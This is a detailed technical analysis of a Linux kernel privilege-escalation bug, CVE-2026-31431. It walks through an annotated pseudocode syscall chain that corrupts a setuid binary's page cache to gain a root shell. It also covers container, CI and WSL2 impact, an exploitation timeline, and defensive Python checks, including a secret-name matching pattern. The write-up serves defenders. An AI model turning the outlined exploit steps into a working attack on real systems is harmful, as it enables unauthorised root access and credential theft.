CVE-2026-31431: From 732 Bytes to Root - Anatomy of a Modern Linux Privilege Escalation
CVE-2026-31431 Copy Fail - The 732-Byte Root: Exploit Mechanics, Syscall Chain, and Multi-Environment Blast Radius
Part 1 established what Copy Fail is and where the root cause lives. Part 2 goes deeper into the mechanics: how 40 iterations of a 4-byte scratch write translate into a root shell, why the page cache is the perfect write target, how the exploit degrades gracefully across different kernel configurations, and what happens when it runs inside containers, Kubernetes worker nodes, and WSL2. This part also covers the active exploitation timeline and what threat actor activity has looked like since April 29, 2026.
The Complete Syscall Chain - Every Step Explained
The exploit is not a single syscall doing something forbidden. It is a legal sequence of operations on legitimate kernel interfaces, each individually permitted for unprivileged users, that together abuse a memory aliasing bug in one specific AEAD algorithm implementation. Understanding each step individually is necessary to understand what detection opportunities exist and why they are limited.
Phase 1 - Establishing the Crypto Socket
    # socket() with AF_ALG (family 38) is permitted for any user
    # SOCK_SEQPACKET=5 provides message-oriented, ordered delivery
    fd = socket(AF_ALG=38, SOCK_SEQPACKET=5, 0)

    # Bind to the authencesn AEAD construction
    # authencesn = authenticated encryption with extended sequence numbers (IPsec ESN)
    # Full string: authencesn(hmac(sha256),cbc(aes))
    # This is the specific algorithm where req->dst is used as scratch mid-operation
    bind(fd, {
        .sa_family = AF_ALG,
        .alg_type  = "aead",
        .alg_name  = "authencesn(hmac(sha256),cbc(aes))",
        .alg_feat  = 0,
        .alg_mask  = 0
    })

    # setsockopt with SOL_ALG (279) to set key material and authentication tag size
    # Key bytes are not security-sensitive here - they're attacker-controlled
    # and do not need to be any particular value for the scratch write to occur
    setsockopt(fd, SOL_ALG=279, ALG_SET_KEY, key_bytes, key_len)
    setsockopt(fd, SOL_ALG=279, ALG_SET_AEAD_AUTHSIZE, NULL, authsize)

    # accept() produces the operation file descriptor
    # All actual crypto work happens on op_fd, not on fd
    op_fd = accept(fd, NULL, NULL)
No special privilege or capability is required to call socket(AF_ALG, ...), bind(), or setsockopt(SOL_ALG, ...). This is by design. The bug is not in the access control - it is in what happens when a legitimate interface is used with a specific algorithm.
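Because the interface is open to unprivileged users by default, a defender may want to confirm whether a given workload can create an AF_ALG socket at all. The following is a minimal defensive sketch, not part of the original write-up: the function name `af_alg_status` and its return strings are illustrative assumptions. It only creates and closes a socket and performs no crypto operation.

```python
import socket


def af_alg_status():
    """Report whether this process may create an AF_ALG socket.

    Returns one of: "unsupported" (Python build or OS lacks AF_ALG),
    "blocked" (denied by policy such as seccomp or an LSM),
    "unavailable" (kernel refused for another reason),
    "allowed" (socket creation succeeded).
    """
    family = getattr(socket, "AF_ALG", None)
    if family is None:
        return "unsupported"
    try:
        s = socket.socket(family, socket.SOCK_SEQPACKET, 0)
    except PermissionError:
        # EPERM or EACCES: typically a seccomp filter or LSM denial
        return "blocked"
    except OSError:
        # e.g. EAFNOSUPPORT when the address family is not available
        return "unavailable"
    s.close()
    return "allowed"


if __name__ == "__main__":
    print("AF_ALG socket creation:", af_alg_status())
```

Run inside a container or CI job, a result of "allowed" suggests that no filter is restricting the address family for that workload.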
Phase 2 - Preparing the Target File Descriptor
    # Open the target setuid binary read-only
    # Any setuid binary works. /usr/bin/su is the canonical target.
    # O_RDONLY only - no write permission required or used
    suid_fd = open("/usr/bin/su", O_RDONLY)

    # At this point the kernel has already populated page cache for /usr/bin/su
    # from the last read. The page cache entries are marked as read-only
    # from a permissions standpoint, but the AEAD operation will bypass this
    # by going through the crypto subsystem's internal scatterlist, not through
    # normal VFS write paths (which would check permissions).

    # fstat to retrieve file size and calculate target page offsets
    fstat(suid_fd, &stat_buf)
    file_size = stat_buf.st_size
    target_pages = ceil(file_size / PAGE_SIZE)
    payload_offsets = compute_offsets(target_pages)  # where to land the 4-byte writes
splice() into an AF_ALG operation file descriptor does not go through the VFS write path. The pages are transferred as a scatterlist directly into the crypto request structure. When the AEAD operation then writes to req->dst - which, because of the 2017 optimization bug, aliases req->src - it is writing through the crypto subsystem's own memory path, not through VFS. The kernel does not re-check write permissions on page cache entries modified this way.
Phase 3 - The Core Loop: 40 Iterations of 4-Byte Corruption
    # The exploit iterates ~40 times
    # Each iteration targets a different byte offset within /usr/bin/su's page cache
    # Each iteration performs exactly one AEAD operation that produces one 4-byte scratch write
    for offset in payload_offsets:  # ~40 target locations within the binary

        # Seek to the target offset in the setuid binary
        lseek(suid_fd, offset, SEEK_SET)

        # splice() the page cache page at this offset directly into op_fd
        # count = PAGE_SIZE ensures one full page is spliced
        # No userspace buffer is involved - pure kernel-to-kernel transfer
        splice(suid_fd, NULL, op_fd, NULL, PAGE_SIZE, 0)
        #   │
        #   └── kernel maps /usr/bin/su page cache page into the AEAD request's src scatterlist
        #       because of commit 72548b093ee3, src == dst, so the same page is
        #       simultaneously the input AND the output of the crypto operation

        # sendmsg triggers the actual crypto operation
        # The IV is crafted to position the authencesn scratch write
        # at the correct byte offset within the page cache page
        sendmsg(op_fd, &msg, 0)
        #   │
        #   └── authencesn begins processing: reads from req->src
        #       partway through, authencesn writes intermediate MAC state into req->dst
        #       req->dst == req->src == page cache of /usr/bin/su at offset
        #       4 bytes of attacker-influenced data written into kernel page cache
        #       the cached page is now modified in memory; the disk file is unchanged

        # recvmsg drains the output - required to reset op_fd for next iteration
        recvmsg(op_fd, &msg, 0)

    # After ~40 iterations: sufficient page cache corruption to redirect execution
    # The corrupted bytes replace specific instruction bytes within the binary's
    # .text section as mapped in page cache, causing /usr/bin/su to exec a shell
    # instead of performing its normal authentication flow
Phase 4 - Detonation
    # Close the AF_ALG file descriptors - no longer needed
    close(op_fd)
    close(fd)

    # Execute the corrupted in-memory setuid binary
    # Because it is setuid root, the kernel executes it as UID 0
    # Because its .text segment has been replaced in page cache,
    # it executes the attacker's payload instead of its normal code
    execve("/usr/bin/su", ["/usr/bin/su"], envp)

    Result: root shell (UID 0, GID 0)
    Time from exploit start to root: under 5 seconds
    Disk: /usr/bin/su unchanged, sha256sum matches expected value
    Disk: no new files written, no modules loaded, no temp files
The width of the authencesn scratch write is not attacker-controlled: it is a fixed artifact of how the algorithm writes its intermediate MAC state into the destination buffer. What the attacker controls is where each 4-byte write lands, by controlling the IV and the offset passed to lseek() before each splice(). Delivering the complete payload requires enough iterations to overwrite the specific instruction bytes in the target binary that, when replaced, redirect execution to spawn a shell.
Page Cache Mechanics - Why This Is the Perfect Write Target
The Linux page cache is the kernel's primary mechanism for caching file-backed memory. When any process reads a regular file, the kernel populates page cache entries from disk and serves all subsequent reads from those cached pages, avoiding repeated disk I/O. The page cache is global and shared: when process A reads /usr/bin/su and process B later reads /usr/bin/su, they share the same page cache entries. There is exactly one copy of each file page in the kernel's memory at any given time.
This architecture has two consequences that Copy Fail exploits directly:
When the exploit writes into the page cache of /usr/bin/su, that modification is immediately visible to all processes on the system that subsequently execute /usr/bin/su. The corruption is not scoped to the attacker's process. Any process on the system - including ones running as root - that executes the targeted binary after corruption will run the modified in-memory version.
Page cache entries are not automatically flushed back to disk unless they are marked dirty through a write path that goes through the VFS dirty-page mechanism. The AEAD scratch write does not set the page dirty flag through the normal VFS path - it writes directly through the crypto subsystem. The corrupted page may persist in cache indefinitely until memory pressure forces eviction or the system reboots.
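One detection idea that follows from this persistence is to compare what an ordinary buffered read returns (served from the page cache) with what a direct read from storage returns. The sketch below is an assumption-laden illustration, not a method described in the original analysis: the helper names `cached_digest` and `direct_digest` are hypothetical, and O_DIRECT is not supported on every filesystem (the function returns None in that case).

```python
import hashlib
import mmap
import os


def cached_digest(path):
    """SHA-256 of the file as seen through ordinary buffered reads."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def direct_digest(path, block=1 << 20):
    """SHA-256 of the file read with O_DIRECT, or None if unsupported."""
    flag = getattr(os, "O_DIRECT", None)
    if flag is None:
        return None
    try:
        fd = os.open(path, os.O_RDONLY | flag)
    except OSError:
        return None
    buf = mmap.mmap(-1, block)  # anonymous mapping gives a page-aligned buffer
    h = hashlib.sha256()
    try:
        remaining = os.fstat(fd).st_size
        while remaining > 0:
            n = os.readv(fd, [buf])
            if n <= 0:
                break
            h.update(buf[:min(n, remaining)])
            remaining -= n
        # A short read before end-of-file means the result is not trustworthy
        return h.hexdigest() if remaining <= 0 else None
    except OSError:
        return None
    finally:
        buf.close()
        os.close(fd)


def cache_matches_disk(path):
    """True/False when both digests are available, None when they are not."""
    direct = direct_digest(path)
    if direct is None:
        return None
    return direct == cached_digest(path)
```

A result of False for a setuid binary would warrant investigation. A result of True is not proof of integrity, since a corrupted page may already have been evicted.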
Why the Write Does Not Trigger Normal Write-Protection
When userspace opens a file with O_RDONLY and attempts a normal write, the VFS layer checks permissions and rejects it. The AF_ALG pathway completely bypasses this check because the write does not originate from a VFS write call. The sequence is:
- splice() transfers the page cache page into the crypto request's scatterlist without going through any write-side VFS hook
- The authencesn algorithm writes its scratch data into req->dst through the crypto subsystem's own memory access path
- Because req->dst aliases the page cache page (via the 2017 optimization), the write lands there directly
- The kernel never invokes any VFS write path, so no permission check, no inode dirty marking through the normal path, and no filesystem journal entry occurs
What Gets Written and How the Payload Is Structured
The attacker cannot write arbitrary bytes at arbitrary offsets in a single operation. Each iteration delivers exactly 4 bytes at one offset. The payload must therefore be structured such that the target binary's behavior is redirected by the union of approximately 40 such 4-byte patches applied to its in-memory .text segment.
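The arithmetic behind that constraint is simple enough to state explicitly. The sketch below only restates the figures given in the text (4 bytes per iteration, roughly 40 iterations); the function names are illustrative.

```python
import math

WRITE_WIDTH = 4  # bytes delivered per iteration, per the description above


def total_patch_bytes(iterations, width=WRITE_WIDTH):
    """Upper bound on bytes modified by a given number of iterations."""
    return iterations * width


def iterations_needed(patch_bytes, width=WRITE_WIDTH):
    """Minimum iterations required to cover a patch of the given size."""
    return math.ceil(patch_bytes / width)


if __name__ == "__main__":
    print(total_patch_bytes(40))   # 40 iterations x 4 bytes
    print(iterations_needed(160))
```

In other words, roughly 40 iterations bound the total modification at about 160 bytes, which is why the patches target individual instructions rather than replacing large code regions.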
The specific bytes written depend on the algorithm's intermediate MAC state, which is influenced by two attacker-controlled inputs: the key material, set via setsockopt(SOL_ALG, ALG_SET_KEY, ...), and the IV, passed in the sendmsg() control message. By choosing appropriate key and IV values, the attacker selects what value lands at each target offset. The exploit selects target offsets that correspond to specific instructions in the setuid binary's compiled code - replacing a conditional branch, a function call target, or a privilege check return value - such that the aggregate mutation causes the binary to execute execve("/bin/sh", ...) with root privileges instead of its normal authentication logic.
| Exploit Parameter | What the Attacker Controls | Mechanism |
|---|---|---|
| Target offsets | Which bytes in the setuid binary get written | lseek() before each splice() |
| Written values | What 4 bytes land at each offset | setsockopt(SOL_ALG, ALG_SET_KEY) and IV in sendmsg CMSG |
| Algorithm string | Which AEAD algorithm triggers the scratch write | bind() alg_name field |
| Target binary | Which setuid binary is corrupted in page cache | open() path argument |
| Iteration count | How many 4-byte patches are delivered | Number of splice/sendmsg/recvmsg cycles in the loop |
Because the target binary (for example /usr/bin/su) ships as a compiled ELF with a predictable .text layout on each distro, the attacker precomputes the per-distro target offsets and includes them in the 732-byte script as a small lookup table. The kernel-level mechanism - the AF_ALG splice path and the authencesn scratch write - is identical on every Linux distribution, so the same syscall sequence works everywhere. Only the target offsets differ between distros, and those are static per binary version.
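Since any setuid binary is a candidate target, an inventory of setuid files is a reasonable starting point for deciding what to monitor. The following is a small audit sketch under stated assumptions: the function name `find_setuid` and the `root_owned_only` parameter are illustrative, and the directories to scan are left to the caller.

```python
import os
import stat


def find_setuid(roots, root_owned_only=True):
    """Return sorted paths of regular files with the setuid bit set."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, followlinks=False):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable entry
                if not stat.S_ISREG(st.st_mode):
                    continue
                if not st.st_mode & stat.S_ISUID:
                    continue
                if root_owned_only and st.st_uid != 0:
                    continue
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for p in find_setuid(["/usr/bin", "/usr/sbin"]):
        print(p)
```

The resulting list can feed file-integrity or cache-consistency checks for exactly the binaries an attacker would choose from.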
Container Environments - Scope, Constraints, and Escape Conditions
Copy Fail is a kernel-level vulnerability. Containers on Linux share the host kernel. There is no separate kernel per container, and no container runtime (Docker, containerd, CRI-O, podman) patches or abstracts the kernel's crypto subsystem. If the host kernel is unpatched, every container running on that host is on an unpatched kernel.
Whether Copy Fail translates from container-level code execution to host-level root depends entirely on what seccomp, AppArmor, or SELinux policies are enforced on the container workload. The attack surface has two distinct scenarios.
If the container runtime does not apply a seccomp profile that blocks socket(AF_ALG=38, ...), and no AppArmor or SELinux policy denies AF_ALG socket creation, then Copy Fail runs from inside the container with identical mechanics to a bare host exploitation. The resulting root shell runs as UID 0 in the container namespace, with access to the underlying host filesystem via /proc/1/root, /proc/1/fd, or direct mount namespace traversal from root context.
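As an illustration of the seccomp condition described above, the sketch below generates a profile fragment in the JSON format used by Docker and other OCI runtimes that denies socket() when the first argument is AF_ALG (38). This is an assumption-labeled example rather than a vetted policy: the permissive `defaultAction` is used only to keep the fragment short, and a real deployment would more likely add the rule to the runtime's default profile. On architectures that multiplex socket calls through socketcall(), this rule alone would not be sufficient.

```python
import json

AF_ALG = 38  # address family number cited in the text


def deny_af_alg_profile():
    """Build a minimal seccomp profile that rejects socket(AF_ALG, ...)."""
    return {
        # Illustrative only: allow everything except the rule below
        "defaultAction": "SCMP_ACT_ALLOW",
        "syscalls": [
            {
                "names": ["socket"],
                "action": "SCMP_ACT_ERRNO",
                "args": [
                    # Match when argument 0 (the address family) equals 38
                    {"index": 0, "value": AF_ALG, "op": "SCMP_CMP_EQ"}
                ],
            }
        ],
    }


if __name__ == "__main__":
    print(json.dumps(deny_af_alg_profile(), indent=2))
```

With Docker, a profile file like this can be supplied through `--security-opt seccomp=<file>`; Kubernetes exposes an equivalent setting through the pod's seccomp profile configuration.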
Independent testing on OpenShift 4.20 with Restricted-v2 Security Context Constraints confirmed that page cache corruption of the host's setuid binaries is achievable from within a restricted container - because the page cache is shared kernel-wide regardless of namespace. However, achieving UID 0 in the host namespace under strict SCC was not reliably accomplished in all tested configurations. The attack surface is real but not universal under maximum restriction.
Kubernetes Node Compromise Path
In a Kubernetes cluster, worker nodes run many pods sharing a single kernel. If an attacker gains code execution in any pod on a node - whether through an application vulnerability, a malicious container image, or a supply chain compromise - and the node kernel is unpatched, the Copy Fail path to host node root follows the same mechanics. The difference from a standalone Linux host is what becomes accessible after root is achieved on the node.
CI/CD Runner Environments
Continuous integration runners - GitHub Actions, GitLab CI, Jenkins agents, CircleCI - represent a particularly high-value attack surface for Copy Fail. CI runners are designed to execute untrusted or semi-trusted code (the job definition from a repository). If a malicious dependency, a compromised workflow file, or a pull request from a malicious contributor contains Copy Fail as part of a build step, the runner kernel is compromised within seconds.
CI runners typically have environment variables injected with cloud credentials, code signing keys, artifact registry tokens, deployment secrets, and API keys. Root access on the runner makes all of these readable from the process environment or the secrets filesystem.
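To gauge that exposure on a given runner, it can help to list which environment variable names look like secrets. The sketch below is a rough heuristic, not an exhaustive detector: the pattern list and the function name `secret_like_names` are assumptions, and the function deliberately returns names only, never values.

```python
import os
import re

# Heuristic name fragments that commonly indicate credentials (an assumption)
SECRET_HINT = re.compile(
    r"(TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL|API_?KEY|PRIVATE_?KEY)",
    re.IGNORECASE,
)


def secret_like_names(environ=None):
    """Return sorted environment variable names that look like secrets."""
    env = os.environ if environ is None else environ
    return sorted(name for name in env if SECRET_HINT.search(name))


if __name__ == "__main__":
    for name in secret_like_names():
        print(name)
```

Every name in the output is something a root-level compromise of the runner could read, which makes the list a reasonable input for credential-rotation planning.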
With root on the build runner, an attacker can modify the compiled artifact, container image, or package before it is signed and published. This converts a transient runner compromise into a persistent supply chain backdoor that ships in the next release.
Self-hosted CI runners that reuse the same VM or container across multiple jobs are vulnerable to persistence: root access allows modifying the runner agent binary, injecting into the job execution environment, or installing a kernel-level backdoor that survives individual job teardowns.
Windows Subsystem for Linux 2 - A Real Kernel, a Real Attack Surface
WSL2 is architecturally distinct from WSL1. Where WSL1 used a compatibility translation layer, WSL2 runs an actual Linux kernel inside a lightweight Hyper-V virtual machine. That kernel is a real Linux kernel, maintained by Microsoft, built from upstream sources. It ships with the algif_aead module present and the 2017 optimization commit included.
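Whether algif_aead is currently loaded as a module can be read from /proc/modules, whose lines begin with the module name. The following sketch is a hedged illustration with hypothetical function names. Note its main limitation: if the code is built into the kernel rather than compiled as a loadable module, it will not appear in /proc/modules at all, so a negative result is not conclusive.

```python
def loaded_modules(proc_modules_text):
    """Parse /proc/modules content into a set of module names."""
    names = set()
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields:
            names.add(fields[0])  # first field is the module name
    return names


def algif_aead_loaded(path="/proc/modules"):
    """True/False if the module list is readable, None otherwise."""
    try:
        with open(path) as f:
            return "algif_aead" in loaded_modules(f.read())
    except OSError:
        return None


if __name__ == "__main__":
    print("algif_aead loaded:", algif_aead_loaded())
```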
Any developer, data scientist, or engineer running WSL2 on a Windows 10 or Windows 11 machine prior to the May 2026 Patch Tuesday update was running an unpatched Linux kernel. The copy.fail exploit runs identically in a WSL2 shell. An attacker who obtains code execution in a WSL2 environment - through a compromised development tool, a malicious Python package, a backdoored npm module, or a malicious Jupyter notebook - can escalate to root within that WSL2 VM using the same 732-byte script that works on a bare Ubuntu server.
Copy Fail gives UID 0 within the WSL2 Linux environment. This provides access to the WSL2 filesystem, all files mounted from Windows drives under /mnt/c and similar, and any credentials or secrets stored in WSL2 home directories or accessible via WSL2 interop.
WSL2 mounts the Windows user's home directory and all drives. Root in WSL2 can read and write files accessible to the Windows user including .ssh private keys, browser credential stores reachable via the mounted filesystem, cloud CLI credential files (.aws/credentials, .azure/), and any file the Windows user account can access.
To check the kernel in use, run uname -r inside the WSL2 environment for the release string and uname -v for the build date - look for a kernel build dated after April 2026.
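The same check can be scripted for fleet inventory. The sketch below reports the kernel release and build string and flags whether the release looks like a stock WSL2 kernel. The substring test is an assumption based on the naming of Microsoft's standard WSL2 kernels (for example `...-microsoft-standard-WSL2`); custom-built kernels may not match it. No patched version number is hard-coded because the original text does not give one.

```python
import platform


def looks_like_wsl2(release):
    """Heuristic: stock WSL2 kernels carry 'microsoft-standard' in the release."""
    return "microsoft-standard" in release.lower()


def kernel_report():
    """Collect the fields a reviewer would compare against vendor advisories."""
    u = platform.uname()
    return {
        "release": u.release,   # equivalent to `uname -r`
        "version": u.version,   # equivalent to `uname -v`, includes build date
        "wsl2": looks_like_wsl2(u.release),
    }


if __name__ == "__main__":
    for key, value in kernel_report().items():
        print(f"{key}: {value}")
```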
Active Exploitation Timeline and Threat Actor Activity
Copy Fail is notable among high-severity LPEs for the speed at which the gap between disclosure and confirmed exploitation closed. The timeline from public release to CISA KEV listing is one of the shortest on record for a non-remotely-exploitable vulnerability.
[...] algif_aead optimization as introducing a page cache write primitive reachable from unprivileged AF_ALG sockets. Coordinated disclosure process begins with kernel maintainers and major distribution vendors.
[...] algif_aead via kmod. CloudLinux begins rolling out KernelCare livepatches (completed May 1-2).
[...] algif_aead module is disclosed shortly after Copy Fail - demonstrating that the security audit of the AF_ALG subsystem triggered by Copy Fail's disclosure uncovered additional issues in the same code region. Splunk publishes SIEM detection blog for both CVEs.
Exploitation Characteristics Observed in the Wild
CISA's KEV listing confirms exploitation has occurred. Based on threat intelligence from the May 2026 analysis period, the observed exploitation patterns cluster into several categories:
| Exploitation Category | Target Environment | Post-Escalation Objective |
|---|---|---|
| Opportunistic mass exploitation | Any internet-reachable Linux hosts with SSH brute-force initial access, shared hosting environments | Credential harvesting, cryptocurrency mining, botnet enrollment |
| Cloud workload targeting | EC2 instances, GCE VMs, Azure Linux VMs - particularly those with IMDSv1 enabled | Instance metadata credential theft, lateral movement within cloud accounts |
| CI/CD pipeline targeting | Self-hosted GitHub Actions runners, Jenkins agents, GitLab CI runners | Secret exfiltration, artifact tampering, persistent supply chain access |
| Kubernetes node targeting | Worker nodes in multi-tenant clusters, managed Kubernetes (EKS, GKE, AKS) with unpatched node images | Kubelet credential theft, cross-namespace secret access, node-level persistence |
| Ransomware pre-positioning | Enterprise Linux servers with domain or cloud credentials accessible after root escalation | Credential staging, data exfiltration prior to encryption, lateral movement setup |
Time-to-Exploit Analysis - Why Zero Days Between Disclosure and Weaponization Matters
Most vulnerability disclosures follow a pattern where a window exists between the CVE being published and a working exploit appearing publicly. That window - even if it lasts only 24-48 hours - gives defenders time to triage, prioritize, and push patches before exploitation begins. Copy Fail eliminated this window entirely.
| Metric | Value | Risk Interpretation |
|---|---|---|
| Disclosure to public exploit | 0 days | Simultaneous release - no triage window for defenders |
| Disclosure to confirmed wild exploitation | 2 days | Immediate - KEV listing on May 1 proves real attacks began within 48 hours |
| Disclosure to first vendor patches | 1 day | AlmaLinux patched April 30; most distros within 48-72 hours |
| Patch-to-exploitation gap | Negative | Exploitation began before patches were universally available |
| Vulnerability lifetime before disclosure | ~9 years | Maximum possible silent exploitation window if discovered earlier by threat actors |
| Exploit reliability affecting response urgency | Deterministic | No false-start exploitation attempts - every attempt succeeds on unpatched systems |
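The day counts in the table follow directly from the dates given in this article (disclosure on April 29, 2026; first vendor patch on April 30; KEV listing on May 1). A short worked check, using only those dates:

```python
from datetime import date

# Dates as stated in the article
DISCLOSURE = date(2026, 4, 29)
FIRST_VENDOR_PATCH = date(2026, 4, 30)  # AlmaLinux
KEV_LISTING = date(2026, 5, 1)


def days_between(start, end):
    """Whole days elapsed from start to end."""
    return (end - start).days


if __name__ == "__main__":
    print("Disclosure to first patch:", days_between(DISCLOSURE, FIRST_VENDOR_PATCH))
    print("Disclosure to KEV listing:", days_between(DISCLOSURE, KEV_LISTING))
```

The two results correspond to the 1-day and 2-day rows above. The 0-day figure for the public exploit reflects simultaneous release rather than a computed interval.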
